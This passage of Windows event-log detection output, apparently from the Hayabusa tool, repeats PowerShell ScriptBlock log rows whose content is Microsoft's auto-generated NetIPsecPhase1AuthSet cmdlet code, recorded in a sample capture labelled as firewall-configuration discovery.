[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecPhase1AuthSet' function Rename-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', Pos",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"itionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParam",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"eter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecPhase1AuthSet' function Copy-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] 